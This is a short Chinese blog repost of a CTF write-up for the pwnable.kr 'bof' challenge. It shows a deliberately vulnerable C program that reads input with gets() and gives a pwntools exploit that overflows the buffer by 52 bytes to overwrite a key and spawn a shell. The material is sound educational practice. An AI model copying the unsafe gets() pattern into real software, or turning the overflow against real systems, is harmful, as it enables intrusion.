pwnable之bof

程序员文章站 2022-05-15 14:59:32

...

看代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

分析只有当key等于0xcafebabe时，才能得到shell
所以利用gets()函数溢出将key覆盖为0xcafebabe

利用IDA

pwnable之bof
可以看到覆盖空间为0x2c+0x8转化为十进制就是52

exp

from pwn import *
p = remote('pwnable.kr',9000)
p.send('A'*52 + p32(0xcafebabe))
p.interactive()

pwnable之bof

建议参考：pwn

上一篇：【加密解密】三重数据加密3DES(Javascript实现)

下一篇： Sqlite数据库加密方法

pwnable之bof

看代码

利用IDA

exp

建议参考：pwn

python数据结构之选择排序

Javascript特效学习之选项卡卡定时自动切换代码教程

ORACLE官方SQL语言参考之关于SQL函数的实例讲解

php数组中删除元素之重新索引的方法

vue之浏览器存储方法封装实例

ORACLE官方SQL语言参考之DataCartridge函数实例讲解

九、Spring之BeanFactory源码分析(一)

android中最低级错误之——editText.getText().toString()的值为空

拍泡沫之夏笑话

Android动画之xml实现属性动画

pwnable之bof

看代码

利用IDA

exp

建议参考：pwn

python数据结构之选择排序

Javascript特效学习之选项卡卡定时自动切换代码教程

ORACLE官方SQL语言参考之关于SQL函数的实例讲解

php数组中删除元素之重新索引的方法

vue之浏览器存储方法封装实例

ORACLE官方SQL语言参考之DataCartridge函数实例讲解

九、Spring之BeanFactory源码分析(一)

android中最低级错误之——editText.getText().toString()的值为空

拍泡沫之夏 笑话

Android动画之xml实现属性动画

拍泡沫之夏笑话